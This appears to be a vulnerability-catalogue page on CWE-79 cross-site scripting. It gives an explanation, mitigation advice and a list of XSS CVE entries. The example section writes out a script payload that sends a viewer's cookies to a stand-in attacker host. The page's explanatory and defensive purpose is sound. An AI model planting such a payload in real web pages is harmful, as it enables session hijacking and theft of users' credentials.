Fallos del tipo CWE-79

30.218 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-46237MEDIUMPHPGurukul Hospital Management System 4.0 is vulnerable to Cross Site Scripting (XSS) via the patname, pataddress, and medhis parameters in EPSS 0.3%CVE-2023-7295MEDIUMVideo Grid <= 1.21 - Reflected Cross-Site ScriptingEPSS 0.3%CVE-2026-3763MEDIUMcode-projects Simple Flight Ticket Booking System showhistory.php cross site scriptingEPSS 0.3%CVE-2025-30544HIGHWordPress OK Poster Group plugin <= 1.1 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2026-110524MEDIUMCopy Anything to Clipboard < 5.5.5 - Contributor+ Stored XSS via 'success-text' Shortcode AttributeEPSS 0.3%CVE-2024-38674MEDIUMWordPress SKT Addons for Elementor plugin <= 3.0 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2026-8296MEDIUMIn affected versions of Octopus Server with certain access levels it was possible to embed a Cross-Site Scripting Payload via artifacts.EPSS 0.3%CVE-2025-30837HIGHWordPress WooCommerce Fattureincloud plugin <= 2.6.7 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2026-3702MEDIUMSourceCodester Loan Management System index.php cross site scriptingEPSS 0.3%CVE-2024-53796MEDIUMWordPress Themesflat Addons For Elementor plugin <= 2.2.2 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2026-23839CRITICALMovary vulnerable to Cross-site Scripting with `?categoryUpdated=` paramEPSS 0.3%CVE-2026-119764HIGHMythic 3.2.16 through 3.4.0.61 Stored XSS via Agent-Downloaded File PreviewEPSS 0.3%CVE-2025-2124MEDIUMControl iD RH iD API change_password cross site scriptingEPSS 0.3%CVE-2023-53688MEDIUMNagios XI < 5.11.3 XSS & CSRF via Hypermap ReplayEPSS 0.3%CVE-2025-30548HIGHWordPress Advanced Post Search plugin <= 1.1.0 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-10048MEDIUMPost Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via pageEPSS 0.3%CVE-2024-22158MEDIUMWordPress PeepSo Core: Photos Plugin < 6.3.1.0 is vulnerable to Cross Site Scripting (XSS)EPSS 0.3%CVE-2024-27963MEDIUMWordPress Crisp – Live Chat and Chatbot plugin <= 0.44 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-31349MEDIUMWordPress MailMunch – Grow your Email List plugin <= 3.1.6 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-32456MEDIUMWordPress Envo Extra plugin <= 1.8.11 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%